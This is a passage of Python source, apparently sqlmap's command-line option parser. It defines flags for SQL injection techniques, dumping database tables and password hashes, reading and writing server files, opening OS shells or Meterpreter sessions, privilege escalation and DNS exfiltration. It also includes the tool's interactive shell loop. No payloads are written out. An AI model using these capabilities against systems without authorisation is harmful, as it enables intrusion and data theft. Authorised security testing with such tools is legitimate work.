Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))\")\n\n        request.add_argument(\"--check-tor\", dest=\"checkTor\", action=\"store_true\",\n            help=\"Check to see if Tor is used properly\")\n\n        request.add_argument(\"--delay\", dest=\"delay\", type=float,\n            help=\"Delay in seconds between each HTTP request\")\n\n        request.add_argument(\"--timeout\", dest=\"timeout\", type=float,\n            help=\"Seconds to wait before timeout connection (default %d)\" % defaults.timeout)\n\n        request.add_argument(\"--retries\", dest=\"retries\", type=int,\n            help=\"Retries when the connection timeouts (default %d)\" % defaults.retries)\n\n        request.add_argument(\"--retry-on\", dest=\"retryOn\",\n            help=\"Retry request on regexp matching content (e.g. \\\"drop\\\")\")\n\n        request.add_argument(\"--randomize\", dest=\"rParam\",\n            help=\"Randomly change value for given parameter(s)\")\n\n        request.add_argument(\"--safe-url\", dest=\"safeUrl\",\n            help=\"URL address to visit frequently during testing\")\n\n        request.add_argument(\"--safe-post\", dest=\"safePost\",\n            help=\"POST data to send to a safe URL\")\n\n        request.add_argument(\"--safe-req\", dest=\"safeReqFile\",\n            help=\"Load safe HTTP request from a file\")\n\n        request.add_argument(\"--safe-freq\", dest=\"safeFreq\", type=int,\n            help=\"Regular requests between visits to a safe URL\")\n\n        request.add_argument(\"--skip-urlencode\", dest=\"skipUrlEncode\", action=\"store_true\",\n            help=\"Skip URL encoding of payload data\")\n\n        request.add_argument(\"--csrf-token\", dest=\"csrfToken\",\n            help=\"Parameter used to hold anti-CSRF token\")\n\n        request.add_argument(\"--csrf-url\", dest=\"csrfUrl\",\n            help=\"URL address to visit for extraction of anti-CSRF token\")\n\n        request.add_argument(\"--csrf-method\", dest=\"csrfMethod\",\n            help=\"HTTP method to use during anti-CSRF token page visit\")\n\n        request.add_argument(\"--csrf-retries\", dest=\"csrfRetries\", type=int,\n            help=\"Retries for anti-CSRF token retrieval (default %d)\" % defaults.csrfRetries)\n\n        request.add_argument(\"--force-ssl\", dest=\"forceSSL\", action=\"store_true\",\n            help=\"Force usage of SSL/HTTPS\")\n\n        request.add_argument(\"--chunked\", dest=\"chunked\", action=\"store_true\",\n            help=\"Use HTTP chunked transfer encoded (POST) requests\")\n\n        request.add_argument(\"--hpp\", dest=\"hpp\", action=\"store_true\",\n            help=\"Use HTTP parameter pollution method\")\n\n        request.add_argument(\"--eval\", dest=\"evalCode\",\n            help=\"Evaluate provided Python code before the request (e.g. \\\"import hashlib;id2=hashlib.md5(id).hexdigest()\\\")\")\n\n        # Optimization options\n        optimization = parser.add_argument_group(\"Optimization\", \"These options can be used to optimize the performance of sqlmap\")\n\n        optimization.add_argument(\"-o\", dest=\"optimize\", action=\"store_true\",\n            help=\"Turn on all optimization switches\")\n\n        optimization.add_argument(\"--predict-output\", dest=\"predictOutput\", action=\"store_true\",\n            help=\"Predict common queries output\")\n\n        optimization.add_argument(\"--keep-alive\", dest=\"keepAlive\", action=\"store_true\",\n            help=\"Use persistent HTTP(s) connections\")\n\n        optimization.add_argument(\"--null-connection\", dest=\"nullConnection\", action=\"store_true\",\n            help=\"Retrieve page length without actual HTTP response body\")\n\n        optimization.add_argument(\"--threads\", dest=\"threads\", type=int,\n            help=\"Max number of concurrent HTTP(s) requests (default %d)\" % defaults.threads)\n\n        # Injection options\n        injection = parser.add_argument_group(\"Injection\", \"These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts\")\n\n        injection.add_argument(\"-p\", dest=\"testParameter\",\n            help=\"Testable parameter(s)\")\n\n        injection.add_argument(\"--skip\", dest=\"skip\",\n            help=\"Skip testing for given parameter(s)\")\n\n        injection.add_argument(\"--skip-static\", dest=\"skipStatic\", action=\"store_true\",\n            help=\"Skip testing parameters that not appear to be dynamic\")\n\n        injection.add_argument(\"--param-exclude\", dest=\"paramExclude\",\n            help=\"Regexp to exclude parameters from testing (e.g. \\\"ses\\\")\")\n\n        injection.add_argument(\"--param-filter\", dest=\"paramFilter\",\n            help=\"Select testable parameter(s) by place (e.g. \\\"POST\\\")\")\n\n        injection.add_argument(\"--dbms\", dest=\"dbms\",\n            help=\"Force back-end DBMS to provided value\")\n\n        injection.add_argument(\"--dbms-cred\", dest=\"dbmsCred\",\n            help=\"DBMS authentication credentials (user:password)\")\n\n        injection.add_argument(\"--os\", dest=\"os\",\n            help=\"Force back-end DBMS operating system to provided value\")\n\n        injection.add_argument(\"--invalid-bignum\", dest=\"invalidBignum\", action=\"store_true\",\n            help=\"Use big numbers for invalidating values\")\n\n        injection.add_argument(\"--invalid-logical\", dest=\"invalidLogical\", action=\"store_true\",\n            help=\"Use logical operations for invalidating values\")\n\n        injection.add_argument(\"--invalid-string\", dest=\"invalidString\", action=\"store_true\",\n            help=\"Use random strings for invalidating values\")\n\n        injection.add_argument(\"--no-cast\", dest=\"noCast\", action=\"store_true\",\n            help=\"Turn off payload casting mechanism\")\n\n        injection.add_argument(\"--no-escape\", dest=\"noEscape\", action=\"store_true\",\n            help=\"Turn off string escaping mechanism\")\n\n        injection.add_argument(\"--prefix\", dest=\"prefix\",\n            help=\"Injection payload prefix string\")\n\n        injection.add_argument(\"--suffix\", dest=\"suffix\",\n            help=\"Injection payload suffix string\")\n\n        injection.add_argument(\"--tamper\", dest=\"tamper\",\n            help=\"Use given script(s) for tampering injection data\")\n\n        # Detection options\n        detection = parser.add_argument_group(\"Detection\", \"These options can be used to customize the detection phase\")\n\n        detection.add_argument(\"--level\", dest=\"level\", type=int,\n            help=\"Level of tests to perform (1-5, default %d)\" % defaults.level)\n\n        detection.add_argument(\"--risk\", dest=\"risk\", type=int,\n            help=\"Risk of tests to perform (1-3, default %d)\" % defaults.risk)\n\n        detection.add_argument(\"--string\", dest=\"string\",\n            help=\"String to match when query is evaluated to True\")\n\n        detection.add_argument(\"--not-string\", dest=\"notString\",\n            help=\"String to match when query is evaluated to False\")\n\n        detection.add_argument(\"--regexp\", dest=\"regexp\",\n            help=\"Regexp to match when query is evaluated to True\")\n\n        detection.add_argument(\"--code\", dest=\"code\", type=int,\n            help=\"HTTP code to match when query is evaluated to True\")\n\n        detection.add_argument(\"--smart\", dest=\"smart\", action=\"store_true\",\n            help=\"Perform thorough tests only if positive heuristic(s)\")\n\n        detection.add_argument(\"--text-only\", dest=\"textOnly\", action=\"store_true\",\n            help=\"Compare pages based only on the textual content\")\n\n        detection.add_argument(\"--titles\", dest=\"titles\", action=\"store_true\",\n            help=\"Compare pages based only on their titles\")\n\n        # Techniques options\n        techniques = parser.add_argument_group(\"Techniques\", \"These options can be used to tweak testing of specific SQL injection techniques\")\n\n        techniques.add_argument(\"--technique\", dest=\"technique\",\n            help=\"SQL injection techniques to use (default \\\"%s\\\")\" % defaults.technique)\n\n        techniques.add_argument(\"--time-sec\", dest=\"timeSec\", type=int,\n            help=\"Seconds to delay the DBMS response (default %d)\" % defaults.timeSec)\n\n        techniques.add_argument(\"--union-cols\", dest=\"uCols\",\n            help=\"Range of columns to test for UNION query SQL injection\")\n\n        techniques.add_argument(\"--union-char\", dest=\"uChar\",\n            help=\"Character to use for bruteforcing number of columns\")\n\n        techniques.add_argument(\"--union-from\", dest=\"uFrom\",\n            help=\"Table to use in FROM part of UNION query SQL injection\")\n\n        techniques.add_argument(\"--dns-domain\", dest=\"dnsDomain\",\n            help=\"Domain name used for DNS exfiltration attack\")\n\n        techniques.add_argument(\"--second-url\", dest=\"secondUrl\",\n            help=\"Resulting page URL searched for second-order response\")\n\n        techniques.add_argument(\"--second-req\", dest=\"secondReq\",\n            help=\"Load second-order HTTP request from file\")\n\n        # Fingerprint options\n        fingerprint = parser.add_argument_group(\"Fingerprint\")\n\n        fingerprint.add_argument(\"-f\", \"--fingerprint\", dest=\"extensiveFp\", action=\"store_true\",\n            help=\"Perform an extensive DBMS version fingerprint\")\n\n        # Enumeration options\n        enumeration = parser.add_argument_group(\"Enumeration\", \"These options can be used to enumerate the back-end database management system information, structure and data contained in the tables\")\n\n        enumeration.add_argument(\"-a\", \"--all\", dest=\"getAll\", action=\"store_true\",\n            help=\"Retrieve everything\")\n\n        enumeration.add_argument(\"-b\", \"--banner\", dest=\"getBanner\", action=\"store_true\",\n            help=\"Retrieve DBMS banner\")\n\n        enumeration.add_argument(\"--current-user\", dest=\"getCurrentUser\", action=\"store_true\",\n            help=\"Retrieve DBMS current user\")\n\n        enumeration.add_argument(\"--current-db\", dest=\"getCurrentDb\", action=\"store_true\",\n            help=\"Retrieve DBMS current database\")\n\n        enumeration.add_argument(\"--hostname\", dest=\"getHostname\", action=\"store_true\",\n            help=\"Retrieve DBMS server hostname\")\n\n        enumeration.add_argument(\"--is-dba\", dest=\"isDba\", action=\"store_true\",\n            help=\"Detect if the DBMS current user is DBA\")\n\n        enumeration.add_argument(\"--users\", dest=\"getUsers\", action=\"store_true\",\n            help=\"Enumerate DBMS users\")\n\n        enumeration.add_argument(\"--passwords\", dest=\"getPasswordHashes\", action=\"store_true\",\n            help=\"Enumerate DBMS users password hashes\")\n\n        enumeration.add_argument(\"--privileges\", dest=\"getPrivileges\", action=\"store_true\",\n            help=\"Enumerate DBMS users privileges\")\n\n        enumeration.add_argument(\"--roles\", dest=\"getRoles\", action=\"store_true\",\n            help=\"Enumerate DBMS users roles\")\n\n        enumeration.add_argument(\"--dbs\", dest=\"getDbs\", action=\"store_true\",\n            help=\"Enumerate DBMS databases\")\n\n        enumeration.add_argument(\"--tables\", dest=\"getTables\", action=\"store_true\",\n            help=\"Enumerate DBMS database tables\")\n\n        enumeration.add_argument(\"--columns\", dest=\"getColumns\", action=\"store_true\",\n            help=\"Enumerate DBMS database table columns\")\n\n        enumeration.add_argument(\"--schema\", dest=\"getSchema\", action=\"store_true\",\n            help=\"Enumerate DBMS schema\")\n\n        enumeration.add_argument(\"--count\", dest=\"getCount\", action=\"store_true\",\n            help=\"Retrieve number of entries for table(s)\")\n\n        enumeration.add_argument(\"--dump\", dest=\"dumpTable\", action=\"store_true\",\n            help=\"Dump DBMS database table entries\")\n\n        enumeration.add_argument(\"--dump-all\", dest=\"dumpAll\", action=\"store_true\",\n            help=\"Dump all DBMS databases tables entries\")\n\n        enumeration.add_argument(\"--search\", dest=\"search\", action=\"store_true\",\n            help=\"Search column(s), table(s) and/or database name(s)\")\n\n        enumeration.add_argument(\"--comments\", dest=\"getComments\", action=\"store_true\",\n            help=\"Check for DBMS comments during enumeration\")\n\n        enumeration.add_argument(\"--statements\", dest=\"getStatements\", action=\"store_true\",\n            help=\"Retrieve SQL statements being run on DBMS\")\n\n        enumeration.add_argument(\"-D\", dest=\"db\",\n            help=\"DBMS database to enumerate\")\n\n        enumeration.add_argument(\"-T\", dest=\"tbl\",\n            help=\"DBMS database table(s) to enumerate\")\n\n        enumeration.add_argument(\"-C\", dest=\"col\",\n            help=\"DBMS database table column(s) to enumerate\")\n\n        enumeration.add_argument(\"-X\", dest=\"exclude\",\n            help=\"DBMS database identifier(s) to not enumerate\")\n\n        enumeration.add_argument(\"-U\", dest=\"user\",\n            help=\"DBMS user to enumerate\")\n\n        enumeration.add_argument(\"--exclude-sysdbs\", dest=\"excludeSysDbs\", action=\"store_true\",\n            help=\"Exclude DBMS system databases when enumerating tables\")\n\n        enumeration.add_argument(\"--pivot-column\", dest=\"pivotColumn\",\n            help=\"Pivot column name\")\n\n        enumeration.add_argument(\"--where\", dest=\"dumpWhere\",\n            help=\"Use WHERE condition while table dumping\")\n\n        enumeration.add_argument(\"--start\", dest=\"limitStart\", type=int,\n            help=\"First dump table entry to retrieve\")\n\n        enumeration.add_argument(\"--stop\", dest=\"limitStop\", type=int,\n            help=\"Last dump table entry to retrieve\")\n\n        enumeration.add_argument(\"--first\", dest=\"firstChar\", type=int,\n            help=\"First query output word character to retrieve\")\n\n        enumeration.add_argument(\"--last\", dest=\"lastChar\", type=int,\n            help=\"Last query output word character to retrieve\")\n\n        enumeration.add_argument(\"--sql-query\", dest=\"sqlQuery\",\n            help=\"SQL statement to be executed\")\n\n        enumeration.add_argument(\"--sql-shell\", dest=\"sqlShell\", action=\"store_true\",\n            help=\"Prompt for an interactive SQL shell\")\n\n        enumeration.add_argument(\"--sql-file\", dest=\"sqlFile\",\n            help=\"Execute SQL statements from given file(s)\")\n\n        # Brute force options\n        brute = parser.add_argument_group(\"Brute force\", \"These options can be used to run brute force checks\")\n\n        brute.add_argument(\"--common-tables\", dest=\"commonTables\", action=\"store_true\",\n            help=\"Check existence of common tables\")\n\n        brute.add_argument(\"--common-columns\", dest=\"commonColumns\", action=\"store_true\",\n            help=\"Check existence of common columns\")\n\n        brute.add_argument(\"--common-files\", dest=\"commonFiles\", action=\"store_true\",\n            help=\"Check existence of common files\")\n\n        # User-defined function options\n        udf = parser.add_argument_group(\"User-defined function injection\", \"These options can be used to create custom user-defined functions\")\n\n        udf.add_argument(\"--udf-inject\", dest=\"udfInject\", action=\"store_true\",\n            help=\"Inject custom user-defined functions\")\n\n        udf.add_argument(\"--shared-lib\", dest=\"shLib\",\n            help=\"Local path of the shared library\")\n\n        # File system options\n        filesystem = parser.add_argument_group(\"File system access\", \"These options can be used to access the back-end database management system underlying file system\")\n\n        filesystem.add_argument(\"--file-read\", dest=\"fileRead\",\n            help=\"Read a file from the back-end DBMS file system\")\n\n        filesystem.add_argument(\"--file-write\", dest=\"fileWrite\",\n            help=\"Write a local file on the back-end DBMS file system\")\n\n        filesystem.add_argument(\"--file-dest\", dest=\"fileDest\",\n            help=\"Back-end DBMS absolute filepath to write to\")\n\n        # Takeover options\n        takeover = parser.add_argument_group(\"Operating system access\", \"These options can be used to access the back-end database management system underlying operating system\")\n\n        takeover.add_argument(\"--os-cmd\", dest=\"osCmd\",\n            help=\"Execute an operating system command\")\n\n        takeover.add_argument(\"--os-shell\", dest=\"osShell\", action=\"store_true\",\n            help=\"Prompt for an interactive operating system shell\")\n\n        takeover.add_argument(\"--os-pwn\", dest=\"osPwn\", action=\"store_true\",\n            help=\"Prompt for an OOB shell, Meterpreter or VNC\")\n\n        takeover.add_argument(\"--os-smbrelay\", dest=\"osSmb\", action=\"store_true\",\n            help=\"One click prompt for an OOB shell, Meterpreter or VNC\")\n\n        takeover.add_argument(\"--os-bof\", dest=\"osBof\", action=\"store_true\",\n            help=\"Stored procedure buffer overflow \"\n                                 \"exploitation\")\n\n        takeover.add_argument(\"--priv-esc\", dest=\"privEsc\", action=\"store_true\",\n            help=\"Database process user privilege escalation\")\n\n        takeover.add_argument(\"--msf-path\", dest=\"msfPath\",\n            help=\"Local path where Metasploit Framework is installed\")\n\n        takeover.add_argument(\"--tmp-path\", dest=\"tmpPath\",\n            help=\"Remote absolute path of temporary files directory\")\n\n        # Windows registry options\n        windows = parser.add_argument_group(\"Windows registry access\", \"These options can be used to access the back-end database management system Windows registry\")\n\n        windows.add_argument(\"--reg-read\", dest=\"regRead\", action=\"store_true\",\n            help=\"Read a Windows registry key value\")\n\n        windows.add_argument(\"--reg-add\", dest=\"regAdd\", action=\"store_true\",\n            help=\"Write a Windows registry key value data\")\n\n        windows.add_argument(\"--reg-del\", dest=\"regDel\", action=\"store_true\",\n            help=\"Delete a Windows registry key value\")\n\n        windows.add_argument(\"--reg-key\", dest=\"regKey\",\n            help=\"Windows registry key\")\n\n        windows.add_argument(\"--reg-value\", dest=\"regVal\",\n            help=\"Windows registry key value\")\n\n        windows.add_argument(\"--reg-data\", dest=\"regData\",\n            help=\"Windows registry key value data\")\n\n        windows.add_argument(\"--reg-type\", dest=\"regType\",\n            help=\"Windows registry key value type\")\n\n        # General options\n        general = parser.add_argument_group(\"General\", \"These options can be used to set some general working parameters\")\n\n        general.add_argument(\"-s\", dest=\"sessionFile\",\n            help=\"Load session from a stored (.sqlite) file\")\n\n        general.add_argument(\"-t\", dest=\"trafficFile\",\n            help=\"Log all HTTP traffic into a textual file\")\n\n        general.add_argument(\"--answers\", dest=\"answers\",\n            help=\"Set predefined answers (e.g. \\\"quit=N,follow=N\\\")\")\n\n        general.add_argument(\"--base64\", dest=\"base64Parameter\",\n            help=\"Parameter(s) containing Base64 encoded data\")\n\n        general.add_argument(\"--base64-safe\", dest=\"base64Safe\", action=\"store_true\",\n            help=\"Use URL and filename safe Base64 alphabet (RFC 4648)\")\n\n        general.add_argument(\"--batch\", dest=\"batch\", action=\"store_true\",\n            help=\"Never ask for user input, use the default behavior\")\n\n        general.add_argument(\"--binary-fields\", dest=\"binaryFields\",\n            help=\"Result fields having binary values (e.g. \\\"digest\\\")\")\n\n        general.add_argument(\"--check-internet\", dest=\"checkInternet\", action=\"store_true\",\n            help=\"Check Internet connection before assessing the target\")\n\n        general.add_argument(\"--cleanup\", dest=\"cleanup\", action=\"store_true\",\n            help=\"Clean up the DBMS from sqlmap specific UDF and tables\")\n\n        general.add_argument(\"--crawl\", dest=\"crawlDepth\", type=int,\n            help=\"Crawl the website starting from the target URL\")\n\n        general.add_argument(\"--crawl-exclude\", dest=\"crawlExclude\",\n            help=\"Regexp to exclude pages from crawling (e.g. \\\"logout\\\")\")\n\n        general.add_argument(\"--csv-del\", dest=\"csvDel\",\n            help=\"Delimiting character used in CSV output (default \\\"%s\\\")\" % defaults.csvDel)\n\n        general.add_argument(\"--charset\", dest=\"charset\",\n            help=\"Blind SQL injection charset (e.g. \\\"0123456789abcdef\\\")\")\n\n        general.add_argument(\"--dump-format\", dest=\"dumpFormat\",\n            help=\"Format of dumped data (CSV (default), HTML or SQLITE)\")\n\n        general.add_argument(\"--encoding\", dest=\"encoding\",\n            help=\"Character encoding used for data retrieval (e.g. GBK)\")\n\n        general.add_argument(\"--eta\", dest=\"eta\", action=\"store_true\",\n            help=\"Display for each output the estimated time of arrival\")\n\n        general.add_argument(\"--flush-session\", dest=\"flushSession\", action=\"store_true\",\n            help=\"Flush session files for current target\")\n\n        general.add_argument(\"--forms\", dest=\"forms\", action=\"store_true\",\n            help=\"Parse and test forms on target URL\")\n\n        general.add_argument(\"--fresh-queries\", dest=\"freshQueries\", action=\"store_true\",\n            help=\"Ignore query results stored in session file\")\n\n        general.add_argument(\"--gpage\", dest=\"googlePage\", type=int,\n            help=\"Use Google dork results from specified page number\")\n\n        general.add_argument(\"--har\", dest=\"harFile\",\n            help=\"Log all HTTP traffic into a HAR file\")\n\n        general.add_argument(\"--hex\", dest=\"hexConvert\", action=\"store_true\",\n            help=\"Use hex conversion during data retrieval\")\n\n        general.add_argument(\"--output-dir\", dest=\"outputDir\", action=\"store\",\n            help=\"Custom output directory path\")\n\n        general.add_argument(\"--parse-errors\", dest=\"parseErrors\", action=\"store_true\",\n            help=\"Parse and display DBMS error messages from responses\")\n\n        general.add_argument(\"--preprocess\", dest=\"preprocess\",\n            help=\"Use given script(s) for preprocessing (request)\")\n\n        general.add_argument(\"--postprocess\", dest=\"postprocess\",\n            help=\"Use given script(s) for postprocessing (response)\")\n\n        general.add_argument(\"--repair\", dest=\"repair\", action=\"store_true\",\n            help=\"Redump entries having unknown character marker (%s)\" % INFERENCE_UNKNOWN_CHAR)\n\n        general.add_argument(\"--save\", dest=\"saveConfig\",\n            help=\"Save options to a configuration INI file\")\n\n        general.add_argument(\"--scope\", dest=\"scope\",\n            help=\"Regexp for filtering targets\")\n\n        general.add_argument(\"--skip-heuristics\", dest=\"skipHeuristics\", action=\"store_true\",\n            help=\"Skip heuristic detection of vulnerabilities\")\n\n        general.add_argument(\"--skip-waf\", dest=\"skipWaf\", action=\"store_true\",\n            help=\"Skip heuristic detection of WAF/IPS protection\")\n\n        general.add_argument(\"--table-prefix\", dest=\"tablePrefix\",\n            help=\"Prefix used for temporary tables (default: \\\"%s\\\")\" % defaults.tablePrefix)\n\n        general.add_argument(\"--test-filter\", dest=\"testFilter\",\n            help=\"Select tests by payloads and/or titles (e.g. ROW)\")\n\n        general.add_argument(\"--test-skip\", dest=\"testSkip\",\n            help=\"Skip tests by payloads and/or titles (e.g. BENCHMARK)\")\n\n        general.add_argument(\"--web-root\", dest=\"webRoot\",\n            help=\"Web server document root directory (e.g. \\\"/var/www\\\")\")\n\n        # Miscellaneous options\n        miscellaneous = parser.add_argument_group(\"Miscellaneous\", \"These options do not fit into any other category\")\n\n        miscellaneous.add_argument(\"-z\", dest=\"mnemonics\",\n            help=\"Use short mnemonics (e.g. \\\"flu,bat,ban,tec=EU\\\")\")\n\n        miscellaneous.add_argument(\"--alert\", dest=\"alert\",\n            help=\"Run host OS command(s) when SQL injection is found\")\n\n        miscellaneous.add_argument(\"--beep\", dest=\"beep\", action=\"store_true\",\n            help=\"Beep on question and/or when vulnerability is found\")\n\n        miscellaneous.add_argument(\"--dependencies\", dest=\"dependencies\", action=\"store_true\",\n            help=\"Check for missing (optional) sqlmap dependencies\")\n\n        miscellaneous.add_argument(\"--disable-coloring\", dest=\"disableColoring\", action=\"store_true\",\n            help=\"Disable console output coloring\")\n\n        miscellaneous.add_argument(\"--list-tampers\", dest=\"listTampers\", action=\"store_true\",\n            help=\"Display list of available tamper scripts\")\n\n        miscellaneous.add_argument(\"--no-logging\", dest=\"noLogging\", action=\"store_true\",\n            help=\"Disable logging to a file\")\n\n        miscellaneous.add_argument(\"--offline\", dest=\"offline\", action=\"store_true\",\n            help=\"Work in offline mode (only use session data)\")\n\n        miscellaneous.add_argument(\"--purge\", dest=\"purge\", action=\"store_true\",\n            help=\"Safely remove all content from sqlmap data directory\")\n\n        miscellaneous.add_argument(\"--results-file\", dest=\"resultsFile\",\n            help=\"Location of CSV results file in multiple targets mode\")\n\n        miscellaneous.add_argument(\"--shell\", dest=\"shell\", action=\"store_true\",\n            help=\"Prompt for an interactive sqlmap shell\")\n\n        miscellaneous.add_argument(\"--tmp-dir\", dest=\"tmpDir\",\n            help=\"Local directory for storing temporary files\")\n\n        miscellaneous.add_argument(\"--unstable\", dest=\"unstable\", action=\"store_true\",\n            help=\"Adjust options for unstable connections\")\n\n        miscellaneous.add_argument(\"--update\", dest=\"updateAll\", action=\"store_true\",\n            help=\"Update sqlmap\")\n\n        miscellaneous.add_argument(\"--wizard\", dest=\"wizard\", action=\"store_true\",\n            help=\"Simple wizard interface for beginner users\")\n\n        # Hidden and/or experimental options\n        parser.add_argument(\"--crack\", dest=\"hashFile\",\n            help=SUPPRESS)  # \"Load and crack hashes from a file (standalone)\"\n\n        parser.add_argument(\"--dummy\", dest=\"dummy\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--yuge\", dest=\"yuge\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--murphy-rate\", dest=\"murphyRate\", type=int,\n            help=SUPPRESS)\n\n        parser.add_argument(\"--debug\", dest=\"debug\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--deprecations\", dest=\"deprecations\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--disable-multi\", dest=\"disableMulti\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--disable-precon\", dest=\"disablePrecon\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--disable-stats\", dest=\"disableStats\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--profile\", dest=\"profile\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--localhost\", dest=\"localhost\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--force-dbms\", dest=\"forceDbms\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--force-dns\", dest=\"forceDns\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--force-partial\", dest=\"forcePartial\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--force-pivoting\", dest=\"forcePivoting\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--ignore-stdin\", dest=\"ignoreStdin\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--non-interactive\", dest=\"nonInteractive\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--gui\", dest=\"gui\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--smoke-test\", dest=\"smokeTest\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--vuln-test\", dest=\"vulnTest\", action=\"store_true\",\n            help=SUPPRESS)\n\n        # API options\n        parser.add_argument(\"--api\", dest=\"api\", action=\"store_true\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--taskid\", dest=\"taskid\",\n            help=SUPPRESS)\n\n        parser.add_argument(\"--database\", dest=\"database\",\n            help=SUPPRESS)\n\n        # Dirty hack to display longer options without breaking into two lines\n        if hasattr(parser, \"formatter\"):\n            def _(self, *args):\n                retVal = parser.formatter._format_option_strings(*args)\n                if len(retVal) > MAX_HELP_OPTION_LENGTH:\n                    retVal = (\"%%.%ds..\" % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal\n                return retVal\n\n            parser.formatter._format_option_strings = parser.formatter.format_option_strings\n            parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser)\n        else:\n            def _format_action_invocation(self, action):\n                retVal = self.__format_action_invocation(action)\n                if len(retVal) > MAX_HELP_OPTION_LENGTH:\n                    retVal = (\"%%.%ds..\" % (MAX_HELP_OPTION_LENGTH - self._indent_increment)) % retVal\n                return retVal\n\n            parser.formatter_class.__format_action_invocation = parser.formatter_class._format_action_invocation\n            parser.formatter_class._format_action_invocation = _format_action_invocation\n\n        # Dirty hack for making a short option '-hh'\n        if hasattr(parser, \"get_option\"):\n            option = parser.get_option(\"--hh\")\n            option._short_opts = [\"-hh\"]\n            option._long_opts = []\n        else:\n            for action in get_actions(parser):\n                if action.option_strings == [\"--hh\"]:\n                    action.option_strings = [\"-hh\"]\n                    break\n\n        # Dirty hack for inherent help message of switch '-h'\n        if hasattr(parser, \"get_option\"):\n            option = parser.get_option(\"-h\")\n            option.help = option.help.capitalize().replace(\"this help\", \"basic help\")\n        else:\n            for action in get_actions(parser):\n                if action.option_strings == [\"-h\", \"--help\"]:\n                    action.help = action.help.capitalize().replace(\"this help\", \"basic help\")\n                    break\n\n        _ = []\n        advancedHelp = True\n        extraHeaders = []\n        auxIndexes = {}\n\n        # Reference: https://stackoverflow.com/a/4012683 (Note: previously used \"...sys.getfilesystemencoding() or UNICODE_ENCODING\")\n        for arg in argv:\n            _.append(getUnicode(arg, encoding=sys.stdin.encoding))\n\n        argv = _\n        checkOldOptions(argv)\n\n        if \"--gui\" in argv:\n            from lib.core.gui import runGui\n\n            runGui(parser)\n\n            raise SqlmapSilentQuitException\n\n        elif \"--shell\" in argv:\n            _createHomeDirectories()\n\n            parser.usage = \"\"\n            cmdLineOptions.sqlmapShell = True\n\n            commands = set((\"x\", \"q\", \"exit\", \"quit\", \"clear\"))\n            commands.update(get_all_options(parser))\n\n            autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=commands)\n\n            while True:\n                command = None\n                prompt = \"sqlmap > \"\n\n                try:\n                    # Note: in Python2 command should not be converted to Unicode before passing to shlex (Reference: https://bugs.python.org/issue1170)\n                    command = _input(prompt).strip()\n                except (KeyboardInterrupt, EOFError):\n                    print()\n                    raise SqlmapShellQuitException\n\n                command = re.sub(r\"(?i)\\Anew\\s+\", \"\", command or \"\")\n\n                if not command:\n                    continue\n                elif command.lower() == \"clear\":\n                    clearHistory()\n                    dataToStdout(\"[i] history cleared\\n\")\n                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)\n                elif command.lower() in (\"x\", \"q\", \"exit\", \"quit\"):\n                    raise SqlmapShellQuitException\n                elif command[0] != '-':\n                    if not re.search(r\"(?i)\\A(\\?|help)\\Z\", command):\n                        dataToStdout(\"[!] invalid option(s) provided\\n\")\n                    dataToStdout(\"[i] valid example: '-u http://www.site.com/vuln.php?id=1 --banner'\\n\")\n                else:\n                    saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)\n                    loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)\n                    break\n\n            try:\n                for arg in shlex.split(command):\n                    argv.append(getUnicode(arg, encoding=sys.stdin.encoding))\n            except ValueError as ex:\n                raise SqlmapSyntaxException(\"something went wrong during command line parsing ('%s')\" % getSafeExString(ex))\n\n        longOptions = set(re.findall(r\"\\-\\-([^= ]+?)=\", parser.format_help()))\n        longSwitches = set(re.findall(r\"\\-\\-([^= ]+?)\\s\", parser.format_help()))\n\n        for i in xrange(len(argv)):\n            # Reference: https://en.wiktionary.org/wiki/-\n            argv[i] = re.sub(u\"\\\\A(\\u2010|\\u2013|\\u2212|\\u2014|\\u4e00|\\u1680|\\uFE63|\\uFF0D)+\", lambda match: '-' * len(match.group(0)), argv[i])\n\n            # Reference: https://unicode-table.com/en/sets/quotation-marks/\n            argv[i] = argv[i].strip(u\"\\u00AB\\u2039\\u00BB\\u203A\\u201E\\u201C\\u201F\\u201D\\u2019\\u275D\\u275E\\u276E\\u276F\\u2E42\\u301D\\u301E\\u301F\\uFF02\\u201A\\u2018\\u201B\\u275B\\u275C\")\n\n            if argv[i] == \"-hh\":\n                argv[i] = \"-h\"\n            elif i == 1 and re.search(r\"\\A(http|www\\.|\\w[\\w.-]+\\.\\w{2,})\", argv[i]) is not None:\n                argv[i] = \"--url=%s\" % argv[i]\n            elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])):\n                dataToStdout(\"[!] copy-pasting illegal (non-console) quote characters from Internet is illegal (%s)\\n\" % argv[i])\n                raise SystemExit\n            elif len(argv[i]) > 1 and u\"\\uff0c\" in argv[i].split('=', 1)[-1]:\n                dataToStdout(\"[!] copy-pasting illegal (non-console) comma characters from Internet is illegal (%s)\\n\" % argv[i])\n                raise 